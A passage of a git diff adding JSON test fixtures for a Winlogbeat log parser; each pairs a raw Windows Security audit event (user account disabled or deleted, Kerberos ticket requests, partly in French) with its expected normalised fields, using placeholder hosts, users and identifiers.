tname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..e147e2eb4 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json @@ -0,0 +1,84 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + }, + "expected": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..53d650df2 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json @@ -0,0 +1,102 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": "security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..7b1f0f39d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json @@ -0,0 +1,101 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 